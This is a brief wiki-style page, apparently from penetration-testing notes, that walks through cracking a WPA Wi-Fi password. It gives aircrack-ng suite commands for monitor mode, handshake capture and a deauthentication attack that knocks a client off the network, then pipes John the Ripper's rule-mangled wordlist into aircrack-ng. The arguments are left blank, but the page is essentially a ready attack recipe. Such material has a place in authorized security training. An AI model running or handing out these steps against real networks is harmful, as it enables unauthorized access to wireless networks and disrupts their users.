aircrack-ng_and_jtr_attack
AIRCRACK-NG AND JTR ATTACK
Aircrack-ng and JTR Attack
Place your wireless card into monitor mode on the channel number of the AP:
airmon-ng start
Start an Airodump capture, filtering on the AP channel and BSSID, saving the capture to disk:
airodump-ng -c --bssid -w
Force a client to reconnect and complete the 4-way handshake by running a deauthentication attack against it:
aireplay-ng -0 1 -a -c
Once a handshake has been captured, change to the John the Ripper directory and pipe in the mangled words into Aircrack-ng to obtain the WPA password:
./john --wordlist= --rules --stdout | aircrack-ng -e -w -
Last updated
Was this helpful?